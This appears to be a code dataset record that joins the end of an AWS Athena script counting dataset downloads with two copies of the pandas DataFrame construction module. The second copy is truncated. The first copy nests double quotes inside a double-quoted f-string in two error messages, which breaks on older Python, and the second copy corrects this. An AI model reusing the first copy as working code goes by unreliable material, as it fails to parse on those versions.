dataset_metrics["total_downloads"] += 1
if "h5ad" in metadata.get("VarCharValue"):
dataset_metrics["h5ad_downloads"] += 1
elif "rds" in metadata.get("VarCharValue"):
dataset_metrics["seurat_downloads"] += 1
if index == 2:
ips.add(metadata.get("VarCharValue"))
if index == 5:
type_of_download = metadata.get("VarCharValue")
if "curl" in type_of_download:
dataset_metrics["curl_downloads"] += 1
else:
dataset_metrics["browser_downloads"] += 1
metadata_by_dataset[dataset_index] = dataset_metrics
dataset_metrics_df = DataFrame.from_dict(metadata_by_dataset, orient="index")
dataset_metrics_df.to_csv("results.csv")
print(f"Total number of downloads of all datasets: {total_downloads}")
print(f"Total number of unique IP addresses: {len(ips)}")
if __name__ == "__main__":
client = boto3.client("athena", region_name="us-west-2")
query_id = str(uuid4())
# Construct dataset id -> collection id and dataset id -> dataset name indices
(
dataset_name_by_s3_uri,
collection_id_by_s3_uri,
) = construct_map_of_dataset_assets_to_collection_and_dataset_information_from_apis()
# Create query
query_execution_id = create_query(client, query_id)
# Get query results
get_query_results(client, query_execution_id, dataset_name_by_s3_uri, collection_id_by_s3_uri)
|
"""
Functions for preparing various inputs passed to the DataFrame or Series
constructors before passing them to a BlockManager.
"""
from __future__ import annotations
from collections import abc
from typing import (
TYPE_CHECKING,
Any,
Hashable,
Sequence,
cast,
)
import warnings
import numpy as np
import numpy.ma as ma
from pandas._libs import lib
from pandas._typing import (
ArrayLike,
DtypeObj,
Manager,
)
from pandas.util._exceptions import find_stack_level
from pandas.core.dtypes.cast import (
construct_1d_arraylike_from_scalar,
dict_compat,
maybe_cast_to_datetime,
maybe_convert_platform,
maybe_infer_to_datetimelike,
maybe_upcast,
)
from pandas.core.dtypes.common import (
is_1d_only_ea_dtype,
is_datetime_or_timedelta_dtype,
is_dtype_equal,
is_extension_array_dtype,
is_integer_dtype,
is_list_like,
is_named_tuple,
is_object_dtype,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCSeries,
)
from pandas.core import (
algorithms,
common as com,
)
from pandas.core.arrays import (
Categorical,
DatetimeArray,
ExtensionArray,
TimedeltaArray,
)
from pandas.core.construction import (
ensure_wrapped_if_datetimelike,
extract_array,
range_to_ndarray,
sanitize_array,
)
from pandas.core.indexes.api import (
DatetimeIndex,
Index,
TimedeltaIndex,
default_index,
ensure_index,
get_objs_combined_axis,
union_indexes,
)
from pandas.core.internals.array_manager import (
ArrayManager,
SingleArrayManager,
)
from pandas.core.internals.blocks import (
BlockPlacement,
ensure_block_shape,
new_block_2d,
)
from pandas.core.internals.managers import (
BlockManager,
SingleBlockManager,
create_block_manager_from_blocks,
create_block_manager_from_column_arrays,
)
if TYPE_CHECKING:
from numpy.ma.mrecords import MaskedRecords
# ---------------------------------------------------------------------
# BlockManager Interface
def arrays_to_mgr(
arrays,
columns: Index,
index,
*,
dtype: DtypeObj | None = None,
verify_integrity: bool = True,
typ: str | None = None,
consolidate: bool = True,
) -> Manager:
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
"""
if verify_integrity:
# figure out the index, if necessary
if index is None:
index = _extract_index(arrays)
else:
index = ensure_index(index)
# don't force copy because getting jammed in an ndarray anyway
arrays = _homogenize(arrays, index, dtype)
# _homogenize ensures
# - all(len(x) == len(index) for x in arrays)
# - all(x.ndim == 1 for x in arrays)
# - all(isinstance(x, (np.ndarray, ExtensionArray)) for x in arrays)
# - all(type(x) is not PandasArray for x in arrays)
else:
index = ensure_index(index)
arrays = [extract_array(x, extract_numpy=True) for x in arrays]
# Reached via DataFrame._from_arrays; we do validation here
for arr in arrays:
if (
not isinstance(arr, (np.ndarray, ExtensionArray))
or arr.ndim != 1
or len(arr) != len(index)
):
raise ValueError(
"Arrays must be 1-dimensional np.ndarray or ExtensionArray "
"with length matching len(index)"
)
columns = ensure_index(columns)
if len(columns) != len(arrays):
raise ValueError("len(arrays) must match len(columns)")
# from BlockManager perspective
axes = [columns, index]
if typ == "block":
return create_block_manager_from_column_arrays(
arrays, axes, consolidate=consolidate
)
elif typ == "array":
return ArrayManager(arrays, [index, columns])
else:
raise ValueError(f"'typ' needs to be one of {{"block", "array"}}, got '{typ}'")
def rec_array_to_mgr(
data: MaskedRecords | np.recarray | np.ndarray,
index,
columns,
dtype: DtypeObj | None,
copy: bool,
typ: str,
):
"""
Extract from a masked rec array and create the manager.
"""
# essentially process a record array then fill it
fdata = ma.getdata(data)
if index is None:
index = default_index(len(fdata))
else:
index = ensure_index(index)
if columns is not None:
columns = ensure_index(columns)
arrays, arr_columns = to_arrays(fdata, columns)
# fill if needed
if isinstance(data, np.ma.MaskedArray):
# GH#42200 we only get here with MaskedRecords, but check for the
# parent class MaskedArray to avoid the need to import MaskedRecords
data = cast("MaskedRecords", data)
new_arrays = fill_masked_arrays(data, arr_columns)
else:
# error: Incompatible types in assignment (expression has type
# "List[ExtensionArray]", variable has type "List[ndarray]")
new_arrays = arrays # type: ignore[assignment]
# create the manager
# error: Argument 1 to "reorder_arrays" has incompatible type "List[ndarray]";
# expected "List[Union[ExtensionArray, ndarray]]"
arrays, arr_columns = reorder_arrays(
new_arrays, arr_columns, columns, len(index) # type: ignore[arg-type]
)
if columns is None:
columns = arr_columns
mgr = arrays_to_mgr(arrays, columns, index, dtype=dtype, typ=typ)
if copy:
mgr = mgr.copy()
return mgr
def fill_masked_arrays(data: MaskedRecords, arr_columns: Index) -> list[np.ndarray]:
"""
Convert numpy MaskedRecords to ensure mask is softened.
"""
new_arrays = []
for col in arr_columns:
arr = data[col]
fv = arr.fill_value
mask = ma.getmaskarray(arr)
if mask.any():
arr, fv = maybe_upcast(arr, fill_value=fv, copy=True)
arr[mask] = fv
new_arrays.append(arr)
return new_arrays
def mgr_to_mgr(mgr, typ: str, copy: bool = True):
"""
Convert to specific type of Manager. Does not copy if the type is already
correct. Does not guarantee a copy otherwise. `copy` keyword only controls
whether conversion from Block->ArrayManager copies the 1D arrays.
"""
new_mgr: Manager
if typ == "block":
if isinstance(mgr, BlockManager):
new_mgr = mgr
else:
if mgr.ndim == 2:
new_mgr = arrays_to_mgr(
mgr.arrays, mgr.axes[0], mgr.axes[1], typ="block"
)
else:
new_mgr = SingleBlockManager.from_array(mgr.arrays[0], mgr.index)
elif typ == "array":
if isinstance(mgr, ArrayManager):
new_mgr = mgr
else:
if mgr.ndim == 2:
arrays = [mgr.iget_values(i) for i in range(len(mgr.axes[0]))]
if copy:
arrays = [arr.copy() for arr in arrays]
new_mgr = ArrayManager(arrays, [mgr.axes[1], mgr.axes[0]])
else:
array = mgr.internal_values()
if copy:
array = array.copy()
new_mgr = SingleArrayManager([array], [mgr.index])
else:
raise ValueError(f"'typ' needs to be one of {{"block", "array"}}, got '{typ}'")
return new_mgr
# ---------------------------------------------------------------------
# DataFrame Constructor Interface
def ndarray_to_mgr(
values, index, columns, dtype: DtypeObj | None, copy: bool, typ: str
) -> Manager:
# used in DataFrame.__init__
# input must be a ndarray, list, Series, Index, ExtensionArray
if isinstance(values, ABCSeries):
if columns is None:
if values.name is not None:
columns = Index([values.name])
if index is None:
index = values.index
else:
values = values.reindex(index)
# zero len case (GH #2234)
if not len(values) and columns is not None and len(columns):
values = np.empty((0, 1), dtype=object)
# if the array preparation does a copy -> avoid this for ArrayManager,
# since the copy is done on conversion to 1D arrays
copy_on_sanitize = False if typ == "array" else copy
vdtype = getattr(values, "dtype", None)
if is_1d_only_ea_dtype(vdtype) or is_1d_only_ea_dtype(dtype):
# GH#19157
if isinstance(values, (np.ndarray, ExtensionArray)) and values.ndim > 1:
# GH#12513 a EA dtype passed with a 2D array, split into
# multiple EAs that view the values
# error: No overload variant of "__getitem__" of "ExtensionArray"
# matches argument type "Tuple[slice, int]"
values = [
values[:, n] # type: ignore[call-overload]
for n in range(values.shape[1])
]
else:
values = [values]
if columns is None:
columns = Index(range(len(values)))
else:
columns = ensure_index(columns)
return arrays_to_mgr(values, columns, index, dtype=dtype, typ=typ)
elif is_extension_array_dtype(vdtype) and not is_1d_only_ea_dtype(vdtype):
# i.e. Datetime64TZ, PeriodDtype
values = extract_array(values, extract_numpy=True)
if copy:
values = values.copy()
if values.ndim == 1:
values = values.reshape(-1, 1)
else:
# by definition an array here
# the dtypes will be coerced to a single dtype
values = _prep_ndarray(values, copy=copy_on_sanitize)
if dtype is not None and not is_dtype_equal(values.dtype, dtype):
shape = values.shape
flat = values.ravel()
# GH#40110 see similar check inside sanitize_array
rcf = not (is_integer_dtype(dtype) and values.dtype.kind == "f")
values = sanitize_array(
flat, None, dtype=dtype, copy=copy_on_sanitize, raise_cast_failure=rcf
)
values = values.reshape(shape)
# _prep_ndarray ensures that values.ndim == 2 at this point
index, columns = _get_axes(
values.shape[0], values.shape[1], index=index, columns=columns
)
_check_values_indices_shape_match(values, index, columns)
if typ == "array":
if issubclass(values.dtype.type, str):
values = np.array(values, dtype=object)
if dtype is None and is_object_dtype(values.dtype):
arrays = [
ensure_wrapped_if_datetimelike(
maybe_infer_to_datetimelike(values[:, i])
)
for i in range(values.shape[1])
]
else:
if is_datetime_or_timedelta_dtype(values.dtype):
values = ensure_wrapped_if_datetimelike(values)
arrays = [values[:, i] for i in range(values.shape[1])]
if copy:
arrays = [arr.copy() for arr in arrays]
return ArrayManager(arrays, [index, columns], verify_integrity=False)
values = values.T
# if we don't have a dtype specified, then try to convert objects
# on the entire block; this is to convert if we have datetimelike's
# embedded in an object type
if dtype is None and is_object_dtype(values.dtype):
obj_columns = list(values)
maybe_datetime = [maybe_infer_to_datetimelike(x) for x in obj_columns]
# don't convert (and copy) the objects if no type inference occurs
if any(x is not y for x, y in zip(obj_columns, maybe_datetime)):
dvals_list = [ensure_block_shape(dval, 2) for dval in maybe_datetime]
block_values = [
new_block_2d(dvals_list[n], placement=BlockPlacement(n))
for n in range(len(dvals_list))
]
else:
bp = BlockPlacement(slice(len(columns)))
nb = new_block_2d(values, placement=bp)
block_values = [nb]
else:
bp = BlockPlacement(slice(len(columns)))
nb = new_block_2d(values, placement=bp)
block_values = [nb]
if len(columns) == 0:
block_values = []
return create_block_manager_from_blocks(
block_values, [columns, index], verify_integrity=False
)
def _check_values_indices_shape_match(
values: np.ndarray, index: Index, columns: Index
) -> None:
"""
Check that the shape implied by our axes matches the actual shape of the
data.
"""
if values.shape[1] != len(columns) or values.shape[0] != len(index):
# Could let this raise in Block constructor, but we get a more
# helpful exception message this way.
if values.shape[0] == 0:
raise ValueError("Empty data passed with indices specified.")
passed = values.shape
implied = (len(index), len(columns))
raise ValueError(f"Shape of passed values is {passed}, indices imply {implied}")
def dict_to_mgr(
data: dict,
index,
columns,
*,
dtype: DtypeObj | None = None,
typ: str = "block",
copy: bool = True,
) -> Manager:
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
Used in DataFrame.__init__
"""
arrays: Sequence[Any] | Series
if columns is not None:
from pandas.core.series import Series
arrays = Series(data, index=columns, dtype=object)
missing = arrays.isna()
if index is None:
# GH10856
# raise ValueError if only scalars in dict
index = _extract_index(arrays[~missing])
else:
index = ensure_index(index)
# no obvious "empty" int column
if missing.any() and not is_integer_dtype(dtype):
nan_dtype: DtypeObj
if dtype is not None:
# calling sanitize_array ensures we don't mix-and-match
# NA dtypes
midxs = missing.values.nonzero()[0]
for i in midxs:
arr = sanitize_array(arrays.iat[i], index, dtype=dtype)
arrays.iat[i] = arr
else:
# GH#1783
nan_dtype = np.dtype("object")
val = construct_1d_arraylike_from_scalar(np.nan, len(index), nan_dtype)
nmissing = missing.sum()
if copy:
rhs = [val] * nmissing
else:
# GH#45369
rhs = [val.copy() for _ in range(nmissing)]
arrays.loc[missing] = rhs
arrays = list(arrays)
columns = ensure_index(columns)
else:
keys = list(data.keys())
columns = Index(keys)
arrays = [com.maybe_iterable_to_list(data[k]) for k in keys]
arrays = [arr if not isinstance(arr, Index) else arr._data for arr in arrays]
if copy:
if typ == "block":
# We only need to copy arrays that will not get consolidated, i.e.
# only EA arrays
arrays = [x.copy() if isinstance(x, ExtensionArray) else x for x in arrays]
else:
# dtype check to exclude e.g. range objects, scalars
arrays = [x.copy() if hasattr(x, "dtype") else x for x in arrays]
return arrays_to_mgr(arrays, columns, index, dtype=dtype, typ=typ, consolidate=copy)
def nested_data_to_arrays(
data: Sequence,
columns: Index | None,
index: Index | None,
dtype: DtypeObj | None,
) -> tuple[list[ArrayLike], Index, Index]:
"""
Convert a single sequence of arrays to multiple arrays.
"""
# By the time we get here we have already checked treat_as_nested(data)
if is_named_tuple(data[0]) and columns is None:
columns = ensure_index(data[0]._fields)
arrays, columns = to_arrays(data, columns, dtype=dtype)
columns = ensure_index(columns)
if index is None:
if isinstance(data[0], ABCSeries):
index = _get_names_from_index(data)
elif isinstance(data[0], Categorical):
# GH#38845 hit in test_constructor_categorical
index = default_index(len(data[0]))
else:
index = default_index(len(data))
return arrays, columns, index
def treat_as_nested(data) -> bool:
"""
Check if we should use nested_data_to_arrays.
"""
return (
len(data) > 0
and is_list_like(data[0])
and getattr(data[0], "ndim", 1) == 1
and not (isinstance(data, ExtensionArray) and data.ndim == 2)
)
# ---------------------------------------------------------------------
def _prep_ndarray(values, copy: bool = True) -> np.ndarray:
if isinstance(values, TimedeltaArray) or (
isinstance(values, DatetimeArray) and values.tz is None
):
# On older numpy, np.asarray below apparently does not call __array__,
# so nanoseconds get dropped.
values = values._ndarray
if not isinstance(values, (np.ndarray, ABCSeries, Index)):
if len(values) == 0:
return np.empty((0, 0), dtype=object)
elif isinstance(values, range):
arr = range_to_ndarray(values)
return arr[..., np.newaxis]
def convert(v):
if not is_list_like(v) or isinstance(v, ABCDataFrame):
return v
v = extract_array(v, extract_numpy=True)
res = maybe_convert_platform(v)
return res
# we could have a 1-dim or 2-dim list here
# this is equiv of np.asarray, but does object conversion
# and platform dtype preservation
if is_list_like(values[0]):
values = np.array([convert(v) for v in values])
elif isinstance(values[0], np.ndarray) and values[0].ndim == 0:
# GH#21861 see test_constructor_list_of_lists
values = np.array([convert(v) for v in values])
else:
values = convert(values)
else:
# drop subclass info
values = np.array(values, copy=copy)
if values.ndim == 1:
values = values.reshape((values.shape[0], 1))
elif values.ndim != 2:
raise ValueError(f"Must pass 2-d input. shape={values.shape}")
return values
def _homogenize(data, index: Index, dtype: DtypeObj | None) -> list[ArrayLike]:
oindex = None
homogenized = []
for val in data:
if isinstance(val, ABCSeries):
if dtype is not None:
val = val.astype(dtype, copy=False)
if val.index is not index:
# Forces alignment. No need to copy data since we
# are putting it into an ndarray later
val = val.reindex(index, copy=False)
val = val._values
else:
if isinstance(val, dict):
# GH#41785 this _should_ be equivalent to (but faster than)
# val = create_series_with_explicit_dtype(val, index=index)._values
if oindex is None:
oindex = index.astype("O")
if isinstance(index, (DatetimeIndex, TimedeltaIndex)):
# see test_constructor_dict_datetime64_index
val = dict_compat(val)
else:
# see test_constructor_subclass_dict
val = dict(val)
val = lib.fast_multiget(val, oindex._values, default=np.nan)
val = sanitize_array(
val, index, dtype=dtype, copy=False, raise_cast_failure=False
)
com.require_length_match(val, index)
homogenized.append(val)
return homogenized
def _extract_index(data) -> Index:
"""
Try to infer an Index from the passed data, raise ValueError on failure.
"""
index = None
if len(data) == 0:
index = Index([])
else:
raw_lengths = []
indexes: list[list[Hashable] | Index] = []
have_raw_arrays = False
have_series = False
have_dicts = False
for val in data:
if isinstance(val, ABCSeries):
have_series = True
indexes.append(val.index)
elif isinstance(val, dict):
have_dicts = True
indexes.append(list(val.keys()))
elif is_list_like(val) and getattr(val, "ndim", 1) == 1:
have_raw_arrays = True
raw_lengths.append(len(val))
elif isinstance(val, np.ndarray) and val.ndim > 1:
raise ValueError("Per-column arrays must each be 1-dimensional")
if not indexes and not raw_lengths:
raise ValueError("If using all scalar values, you must pass an index")
elif have_series:
index = union_indexes(indexes)
elif have_dicts:
index = union_indexes(indexes, sort=False)
if have_raw_arrays:
lengths = list(set(raw_lengths))
if len(lengths) > 1:
raise ValueError("All arrays must be of the same length")
if have_dicts:
raise ValueError(
"Mixing dicts with non-Series may lead to ambiguous ordering."
)
if have_series:
assert index is not None # for mypy
if lengths[0] != len(index):
msg = (
f"array length {lengths[0]} does not match index "
f"length {len(index)}"
)
raise ValueError(msg)
else:
index = default_index(lengths[0])
# error: Argument 1 to "ensure_index" has incompatible type "Optional[Index]";
# expected "Union[Union[Union[ExtensionArray, ndarray], Index, Series],
# Sequence[Any]]"
return ensure_index(index) # type: ignore[arg-type]
def reorder_arrays(
arrays: list[ArrayLike], arr_columns: Index, columns: Index | None, length: int
) -> tuple[list[ArrayLike], Index]:
"""
Pre-emptively (cheaply) reindex arrays with new columns.
"""
# reorder according to the columns
if columns is not None:
if not columns.equals(arr_columns):
# if they are equal, there is nothing to do
new_arrays: list[ArrayLike | None]
new_arrays = [None] * len(columns)
indexer = arr_columns.get_indexer(columns)
for i, k in enumerate(indexer):
if k == -1:
# by convention default is all-NaN object dtype
arr = np.empty(length, dtype=object)
arr.fill(np.nan)
else:
arr = arrays[k]
new_arrays[i] = arr
# Incompatible types in assignment (expression has type
# "List[Union[ExtensionArray, ndarray[Any, Any], None]]", variable
# has type "List[Union[ExtensionArray, ndarray[Any, Any]]]")
arrays = new_arrays # type: ignore[assignment]
arr_columns = columns
return arrays, arr_columns
def _get_names_from_index(data) -> Index:
has_some_name = any(getattr(s, "name", None) is not None for s in data)
if not has_some_name:
return default_index(len(data))
index: list[Hashable] = list(range(len(data)))
count = 0
for i, s in enumerate(data):
n = getattr(s, "name", None)
if n is not None:
index[i] = n
else:
index[i] = f"Unnamed {count}"
count += 1
return Index(index)
def _get_axes(
N: int, K: int, index: Index | None, columns: Index | None
) -> tuple[Index, Index]:
# helper to create the axes as indexes
# return axes or defaults
if index is None:
index = default_index(N)
else:
index = ensure_index(index)
if columns is None:
columns = default_index(K)
else:
columns = ensure_index(columns)
return index, columns
def dataclasses_to_dicts(data):
"""
Converts a list of dataclass instances to a list of dictionaries.
Parameters
----------
data : List[Type[dataclass]]
Returns
--------
list_dict : List[dict]
Examples
--------
>>> from dataclasses import dataclass
>>> @dataclass
... class Point:
... x: int
... y: int
>>> dataclasses_to_dicts([Point(1, 2), Point(2, 3)])
[{'x': 1, 'y': 2}, {'x': 2, 'y': 3}]
"""
from dataclasses import asdict
return list(map(asdict, data))
# ---------------------------------------------------------------------
# Conversion of Inputs to Arrays
def to_arrays(
data, columns: Index | None, dtype: DtypeObj | None = None
) -> tuple[list[ArrayLike], Index]:
"""
Return list of arrays, columns.
Returns
-------
list[ArrayLike]
These will become columns in a DataFrame.
Index
This will become frame.columns.
Notes
-----
Ensures that len(result_arrays) == len(result_index).
"""
if isinstance(data, ABCDataFrame):
# see test_from_records_with_index_data, test_from_records_bad_index_column
if columns is not None:
arrays = [
data._ixs(i, axis=1).values
for i, col in enumerate(data.columns)
if col in columns
]
else:
columns = data.columns
arrays = [data._ixs(i, axis=1).values for i in range(len(columns))]
return arrays, columns
if not len(data):
if isinstance(data, np.ndarray):
if data.dtype.names is not None:
# i.e. numpy structured array
columns = ensure_index(data.dtype.names)
arrays = [data[name] for name in columns]
if len(data) == 0:
# GH#42456 the indexing above results in list of 2D ndarrays
# TODO: is that an issue with numpy?
for i, arr in enumerate(arrays):
if arr.ndim == 2:
arrays[i] = arr[:, 0]
return arrays, columns
return [], ensure_index([])
elif isinstance(data[0], Categorical):
# GH#38845 deprecate special case
warnings.warn(
"The behavior of DataFrame([categorical, ...]) is deprecated and "
"in a future version will be changed to match the behavior of "
"DataFrame([any_listlike, ...]). "
"To retain the old behavior, pass as a dictionary "
"DataFrame({col: categorical, ..})",
FutureWarning,
stacklevel=find_stack_level(),
)
if columns is None:
columns = default_index(len(data))
elif len(columns) > len(data):
raise ValueError("len(columns) > len(data)")
elif len(columns) < len(data):
# doing this here is akin to a pre-emptive reindex
data = data[: len(columns)]
return data, columns
elif isinstance(data, np.ndarray) and data.dtype.names is not None:
# e.g. recarray
columns = Index(list(data.dtype.names))
arrays = [data[k] for k in columns]
return arrays, columns
if isinstance(data[0], (list, tuple)):
arr = _list_to_arrays(data)
elif isinstance(data[0], abc.Mapping):
arr, columns = _list_of_dict_to_arrays(data, columns)
elif isinstance(data[0], ABCSeries):
arr, columns = _list_of_series_to_arrays(data, columns)
else:
# last ditch effort
data = [tuple(x) for x in data]
arr = _list_to_arrays(data)
content, columns = _finalize_columns_and_data(arr, columns, dtype)
return content, columns
def _list_to_arrays(data: list[tuple | list]) -> np.ndarray:
# Returned np.ndarray has ndim = 2
# Note: we already check len(data) > 0 before getting hre
if isinstance(data[0], tuple):
content = lib.to_object_array_tuples(data)
else:
# list of lists
content = lib.to_object_array(data)
return content
def _list_of_series_to_arrays(
data: list,
columns: Index | None,
) -> tuple[np.ndarray, Index]:
# returned np.ndarray has ndim == 2
if columns is None:
# We know pass_data is non-empty because data[0] is a Series
pass_data = [x for x in data if isinstance(x, (ABCSeries, ABCDataFrame))]
columns = get_objs_combined_axis(pass_data, sort=False)
indexer_cache: dict[int, np.ndarray] = {}
aligned_values = []
for s in data:
index = getattr(s, "index", None)
if index is None:
index = default_index(len(s))
if id(index) in indexer_cache:
indexer = indexer_cache[id(index)]
else:
indexer = indexer_cache[id(index)] = index.get_indexer(columns)
values = extract_array(s, extract_numpy=True)
aligned_values.append(algorithms.take_nd(values, indexer))
# error: Argument 1 to "vstack" has incompatible type "List[ExtensionArray]";
# expected "Sequence[Union[Union[int, float, complex, str, bytes, generic],
# Sequence[Union[int, float, complex, str, bytes, generic]],
# Sequence[Sequence[Any]], _SupportsArray]]"
content = np.vstack(aligned_values) # type: ignore[arg-type]
return content, columns
def _list_of_dict_to_arrays(
data: list[dict],
columns: Index | None,
) -> tuple[np.ndarray, Index]:
"""
Convert list of dicts to numpy arrays
if `columns` is not passed, column names are inferred from the records
- for OrderedDict and dicts, the column names match
the key insertion-order from the first record to the last.
- For other kinds of dict-likes, the keys are lexically sorted.
Parameters
----------
data : iterable
collection of records (OrderedDict, dict)
columns: iterables or None
Returns
-------
content : np.ndarray[object, ndim=2]
columns : Index
"""
if columns is None:
gen = (list(x.keys()) for x in data)
sort = not any(isinstance(d, dict) for d in data)
pre_cols = lib.fast_unique_multiple_list_gen(gen, sort=sort)
columns = ensure_index(pre_cols)
# assure that they are of the base dict class and not of derived
# classes
data = [d if type(d) is dict else dict(d) for d in data]
content = lib.dicts_to_array(data, list(columns))
return content, columns
def _finalize_columns_and_data(
content: np.ndarray, # ndim == 2
columns: Index | None,
dtype: DtypeObj | None,
) -> tuple[list[ArrayLike], Index]:
"""
Ensure we have valid columns, cast object dtypes if possible.
"""
contents = list(content.T)
try:
columns = _validate_or_indexify_columns(contents, columns)
except AssertionError as err:
# GH#26429 do not raise user-facing AssertionError
raise ValueError(err) from err
if len(contents) and contents[0].dtype == np.object_:
contents = _convert_object_array(contents, dtype=dtype)
return contents, columns
def _validate_or_indexify_columns(
content: list[np.ndarray], columns: Index | None
) -> Index:
"""
If columns is None, make numbers as column names; Otherwise, validate that
columns have valid length.
Parameters
----------
content : list of np.ndarrays
columns : Index or None
Returns
-------
Index
If columns is None, assign positional column index value as columns.
Raises
------
1. AssertionError when content is not composed of list of lists, and if
length of columns is not equal to length of content.
2. ValueError when content is list of lists, but length of each sub-list
is not equal
3. ValueError when content is list of lists, but length of sub-list is
not equal to length of content
"""
if columns is None:
columns = default_index(len(content))
else:
# Add mask for data which is composed of list of lists
is_mi_list = isinstance(columns, list) and all(
isinstance(col, list) for col in columns
)
if not is_mi_list and len(columns) != len(content): # pragma: no cover
# caller's responsibility to check for this...
raise AssertionError(
f"{len(columns)} columns passed, passed data had "
f"{len(content)} columns"
)
elif is_mi_list:
# check if nested list column, length of each sub-list should be equal
if len({len(col) for col in columns}) > 1:
raise ValueError(
"Length of columns passed for MultiIndex columns is different"
)
# if columns is not empty and length of sublist is not equal to content
elif columns and len(columns[0]) != len(content):
raise ValueError(
f"{len(columns[0])} columns passed, passed data had "
f"{len(content)} columns"
)
return columns
def _convert_object_array(
content: list[np.ndarray], dtype: DtypeObj | None
) -> list[ArrayLike]:
"""
Internal function to convert object array.
Parameters
----------
content: List[np.ndarray]
dtype: np.dtype or ExtensionDtype
Returns
-------
List[ArrayLike]
"""
# provide soft conversion of object dtypes
def convert(arr):
if dtype != np.dtype("O"):
arr = lib.maybe_convert_objects(arr)
arr = maybe_cast_to_datetime(arr, dtype)
return arr
arrays = [convert(arr) for arr in content]
return arrays
| """
Functions for preparing various inputs passed to the DataFrame or Series
constructors before passing them to a BlockManager.
"""
from __future__ import annotations
from collections import abc
from typing import (
TYPE_CHECKING,
Any,
Hashable,
Sequence,
cast,
)
import warnings
import numpy as np
import numpy.ma as ma
from pandas._libs import lib
from pandas._typing import (
ArrayLike,
DtypeObj,
Manager,
)
from pandas.util._exceptions import find_stack_level
from pandas.core.dtypes.cast import (
construct_1d_arraylike_from_scalar,
dict_compat,
maybe_cast_to_datetime,
maybe_convert_platform,
maybe_infer_to_datetimelike,
maybe_upcast,
)
from pandas.core.dtypes.common import (
is_1d_only_ea_dtype,
is_datetime_or_timedelta_dtype,
is_dtype_equal,
is_extension_array_dtype,
is_integer_dtype,
is_list_like,
is_named_tuple,
is_object_dtype,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCSeries,
)
from pandas.core import (
algorithms,
common as com,
)
from pandas.core.arrays import (
Categorical,
DatetimeArray,
ExtensionArray,
TimedeltaArray,
)
from pandas.core.construction import (
ensure_wrapped_if_datetimelike,
extract_array,
range_to_ndarray,
sanitize_array,
)
from pandas.core.indexes.api import (
DatetimeIndex,
Index,
TimedeltaIndex,
default_index,
ensure_index,
get_objs_combined_axis,
union_indexes,
)
from pandas.core.internals.array_manager import (
ArrayManager,
SingleArrayManager,
)
from pandas.core.internals.blocks import (
BlockPlacement,
ensure_block_shape,
new_block_2d,
)
from pandas.core.internals.managers import (
BlockManager,
SingleBlockManager,
create_block_manager_from_blocks,
create_block_manager_from_column_arrays,
)
if TYPE_CHECKING:
from numpy.ma.mrecords import MaskedRecords
# ---------------------------------------------------------------------
# BlockManager Interface
def arrays_to_mgr(
arrays,
columns: Index,
index,
*,
dtype: DtypeObj | None = None,
verify_integrity: bool = True,
typ: str | None = None,
consolidate: bool = True,
) -> Manager:
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
"""
if verify_integrity:
# figure out the index, if necessary
if index is None:
index = _extract_index(arrays)
else:
index = ensure_index(index)
# don't force copy because getting jammed in an ndarray anyway
arrays = _homogenize(arrays, index, dtype)
# _homogenize ensures
# - all(len(x) == len(index) for x in arrays)
# - all(x.ndim == 1 for x in arrays)
# - all(isinstance(x, (np.ndarray, ExtensionArray)) for x in arrays)
# - all(type(x) is not PandasArray for x in arrays)
else:
index = ensure_index(index)
arrays = [extract_array(x, extract_numpy=True) for x in arrays]
# Reached via DataFrame._from_arrays; we do validation here
for arr in arrays:
if (
not isinstance(arr, (np.ndarray, ExtensionArray))
or arr.ndim != 1
or len(arr) != len(index)
):
raise ValueError(
"Arrays must be 1-dimensional np.ndarray or ExtensionArray "
"with length matching len(index)"
)
columns = ensure_index(columns)
if len(columns) != len(arrays):
raise ValueError("len(arrays) must match len(columns)")
# from BlockManager perspective
axes = [columns, index]
if typ == "block":
return create_block_manager_from_column_arrays(
arrays, axes, consolidate=consolidate
)
elif typ == "array":
return ArrayManager(arrays, [index, columns])
else:
raise ValueError(f"'typ' needs to be one of {{'block', 'array'}}, got '{typ}'")
def rec_array_to_mgr(
data: MaskedRecords | np.recarray | np.ndarray,
index,
columns,
dtype: DtypeObj | None,
copy: bool,
typ: str,
):
"""
Extract from a masked rec array and create the manager.
"""
# essentially process a record array then fill it
fdata = ma.getdata(data)
if index is None:
index = default_index(len(fdata))
else:
index = ensure_index(index)
if columns is not None:
columns = ensure_index(columns)
arrays, arr_columns = to_arrays(fdata, columns)
# fill if needed
if isinstance(data, np.ma.MaskedArray):
# GH#42200 we only get here with MaskedRecords, but check for the
# parent class MaskedArray to avoid the need to import MaskedRecords
data = cast("MaskedRecords", data)
new_arrays = fill_masked_arrays(data, arr_columns)
else:
# error: Incompatible types in assignment (expression has type
# "List[ExtensionArray]", variable has type "List[ndarray]")
new_arrays = arrays # type: ignore[assignment]
# create the manager
# error: Argument 1 to "reorder_arrays" has incompatible type "List[ndarray]";
# expected "List[Union[ExtensionArray, ndarray]]"
arrays, arr_columns = reorder_arrays(
new_arrays, arr_columns, columns, len(index) # type: ignore[arg-type]
)
if columns is None:
columns = arr_columns
mgr = arrays_to_mgr(arrays, columns, index, dtype=dtype, typ=typ)
if copy:
mgr = mgr.copy()
return mgr
def fill_masked_arrays(data: MaskedRecords, arr_columns: Index) -> list[np.ndarray]:
"""
Convert numpy MaskedRecords to ensure mask is softened.
"""
new_arrays = []
for col in arr_columns:
arr = data[col]
fv = arr.fill_value
mask = ma.getmaskarray(arr)
if mask.any():
arr, fv = maybe_upcast(arr, fill_value=fv, copy=True)
arr[mask] = fv
new_arrays.append(arr)
return new_arrays
def mgr_to_mgr(mgr, typ: str, copy: bool = True):
"""
Convert to specific type of Manager. Does not copy if the type is already
correct. Does not guarantee a copy otherwise. `copy` keyword only controls
whether conversion from Block->ArrayManager copies the 1D arrays.
"""
new_mgr: Manager
if typ == "block":
if isinstance(mgr, BlockManager):
new_mgr = mgr
else:
if mgr.ndim == 2:
new_mgr = arrays_to_mgr(
mgr.arrays, mgr.axes[0], mgr.axes[1], typ="block"
)
else:
new_mgr = SingleBlockManager.from_array(mgr.arrays[0], mgr.index)
elif typ == "array":
if isinstance(mgr, ArrayManager):
new_mgr = mgr
else:
if mgr.ndim == 2:
arrays = [mgr.iget_values(i) for i in range(len(mgr.axes[0]))]
if copy:
